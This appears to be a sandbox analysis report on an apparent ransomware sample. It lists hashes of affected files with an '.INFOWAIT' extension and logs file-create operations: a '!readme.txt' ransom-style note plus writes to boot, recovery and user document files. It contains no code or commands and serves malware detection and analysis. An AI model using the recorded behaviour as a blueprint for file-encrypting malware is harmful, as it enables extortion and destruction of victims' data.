C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\X8qNDeYP35alh231JX16.mp3	18.50 KB	MD5: 09e26b400e5abcf9c5128aca1480ee0a SHA1: 01b80fcadbbbf222bdc755dd7bc565c4bb706b53 SHA256: 635776c4e9dc2e452d17bad0d9ad2c28085260f2943d4149745b4dbfacc34429 SSDeep: 384:ikABJpJz8+z2O2wnW3KthxPD8qMXV/WsP/KMa/VRpCwUn/CoxfLiunbHF2Vj+:aPVBW6thiqMXVOKyd3wn/rOGbEC	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_BestBet.H1W.INFOWAIT	201.48 KB	MD5: c001f49220eefc8b8cbef5a35bba2167 SHA1: 5dae52581ad09b81faadb048fa415a746af40d9e SHA256: f35bb6e75e696b09e385944a21249cce6e718ae504af2adbb12cf994691952b7 SSDeep: 3072:DWJWeFD2f8koZr5SwCgODjI+TIRMmBQ58OlSNAyskQZWkXqHMF/QjbcJ5KUOIsLH:aw8bZowCgODjBTIGmBQP4AXck6sC	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\znFXRDcUkqphQAEI4ui.bmp	48.95 KB	MD5: 78663eb0675a322cbaf8affafba0f7c5 SHA1: 19313cec234ca0d527cb65ebd23cf7003b3a8a67 SHA256: 9183692957a216914e22b00c419d6c1dcb68ef39aefb42c64124a2e3c7df3cf2 SSDeep: 1536:g8ZtsqudICkjz++gKk+D6bQA1rA0m/CQG/5:hZtsq7CkjS+WddECB5	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn	0.32 KB	MD5: b85d78d22d5170ef033f0e2e47336cc5 SHA1: a37e7fddb55c8b1cdb30fb117f089d8ccf23a4f1 SHA256: 5a299d9deef55d087395774c774f85366a13f8999f7dd27d958804f08d6c7c72 SSDeep: 6:gnO/aNSEfIMWgVbm3PA++eipFPMszjVftQGaWP2TU5S9l0rPpNa:KO/aw5abIN+TpFPMszJfiGJoU5M0Lva	... File Actions Show Properties Download
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi	3.02 MB	MD5: 69da4a98a727eef7d9d4ae85f16cbfef SHA1: 6881ab9c233c39905107e81cd7a07350abc59880 SHA256: f11a005806ce78fb98b390c6f312b1ec40a6b72dea4a099eaf4ded168e079d78 SSDeep: 6144:edUZSFJRl3BrDXxAdnIGqa1ZGz+LcRn7y/EouH/cpi:eqwlRfhAd9p1ZGzjcRuH/c8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	0.13 KB	MD5: a08f4b4189dc3cfa3d75189acd7a8826 SHA1: dadd1631abe9ff229109649caaae1ce35054c1c3 SHA256: d1b9b65a3802a4dee2c74f3cc4fcd443e2010d6bcea56541d0ca24acae640b05 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0RQus:afwSkeMRRkPDz58dz6vtkhgM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\2QiXDoa8V yuTWH7Q.bmp	37.36 KB	MD5: db61b118cdc63807952a4a961aaee34f SHA1: 84a66d97559c49c8215e817e38e69c27e67cea91 SHA256: 37611355a7e7c348dc0dbcfb3116995425359e6c559546b8a906d163afdfb818 SSDeep: 768:hgBtVB5jyHooPPEA8domiMqrBq2XIITqVz8ov1orri2svV:CTyIoPKqrBZIcoCvFAV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PSzsrL7.avi	52.21 KB	MD5: c946a9e49821c576e1f56827cdaddd31 SHA1: 8ee6e40a355080603bbb777d047dd1e22ba53114 SHA256: e1ff22327c5ff5d80634d7b1521e77b8b95ca11fc1cd85ddbae3adfeb43440f5 SSDeep: 768:KZ6OdLS9zk4vr0L/3AYVDLhqo7ScgcV7EG3qrK72WYZw2eGW6s9j8ot1HEE40Sr+:K4OJS9zkEIfhl7SU7EG/RGvs9j8otc+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\Qj0Bxz9rAG9Fja0Mk.wav	34.97 KB	MD5: a2ff8e8da63a328a65573720a972ea62 SHA1: 3d2b8d14ba596fa583c7043e3557f562a682ea25 SHA256: bc7974856885f4c50aa4e174a4077c4920c16d8d93c001b878c507dd9f11d1d8 SSDeep: 768:zHWfGvO9C69M6QIQxZDg+76sQ0htUJlLGKCS9tg2DDdWcn3XVQ:zHWfGF6iKGZN5tc5PNEyDkgVQ	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\MF\Active.GRL.INFOWAIT	14.62 KB	MD5: 2b1fd3109100b588af650c90de327ec8 SHA1: 441f51adc82da0660cb9a48645a3fa6158ed1548 SHA256: 32ec922815c8c31a57ebec344be4bbc2f018b3c5de55124c0601d973e88782e4 SSDeep: 384:Gh4DIiAWVh3ze0ZIMlXt7ne38gF7ysx9TGSEnpQSNoKGIASMr+6oso:GbWr3zqM7e38wDxUpQSNoKG4y+5D	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\w52qqQUsQntD6lz uu_3.m4a	37.39 KB	MD5: e80919e6beb75f3caaab683f49dbfe71 SHA1: 111f7230e210940edbe032b7b847662f8bc9c017 SHA256: 96c801a31ace1bd9d62542ebee16b00df89b8ef9d7d38bb63423ea017ca38f7a SSDeep: 768:OdrYENkMOgdQUtHfuhMpHrJJWctxbAHRqsJomfRBgmaMdQNprT3haK1Ng/IcXe:OqENIgdQkHfuhyH9J1AHRNo+uNV3hH1d	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	1.14 KB	MD5: b810cb40a9c6a75806e673bbdf5aff45 SHA1: 4a79fc6b5e3c62c66e7b16f270d18f20e608b0ae SHA256: 831f79a0bef79e46b92a0343822bd96c2213037f7dd39592eb31f46845edd793 SSDeep: 24:ILozN0UmhL6Kusu9lU1yCzPfmZTqYqeG5ECyh07B98onrhi:IgLkCXEetVDG5E1O7B9Dk	... File Actions Show Properties Download

Host Behavior

File (3551)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\!readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Boot\BCD.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BOOTSTAT.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\cs-CZ\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\da-DK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\de-DE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\el-GR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\es-ES\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fi-FI\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\chs_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\cht_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\jpn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\kor_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\wgl4_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fr-FR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrSecUpd10111.msp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10110_MUI.msp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10116_MUI.msp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\Hx.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSACCESS.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.ONENOTE.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.VISIO.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.VISIO.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.VISIO.SHAPESHEET.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.VISIO_PRM.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.VISIO_STD.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.WINPROJ.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.WINPROJ.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Microsoft Help\nslist.hxl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Mozilla\logs\maintenanceservice-install.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\Sun\Java\Java Update\jaureglist.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-3gHp4i8DBQd4Fi.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\32XcKJ-k MnUkqXRq.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7UQS1.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\86iUKOznOtmWr4FTVK.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\-l0TaG633wu CFDx3Y-.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\2L5Mp4CJ.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\3-Cn.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\Ukc9zVsmz.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\C0QT-PiM3F.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\6qkqye2rCRGlE5P.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\d8R9rMlCN.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FIhr5H47kz.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FiwjPlFCBQK4Eudei\4aIc13i42g6djkDS.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FiwjPlFCBQK4Eudei\S6KMJ lP85NJg.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\MGAfBc25T.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\pplpY8py2zNIuuEmOh7.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\shTUZEa.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\Kgbiq-5bFu_gdXcNS.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\pjRRywz moQN7y4K4.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\r7-FdG2eJ6-ET_j.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\FLEcvhR.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\c4-yyhR.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
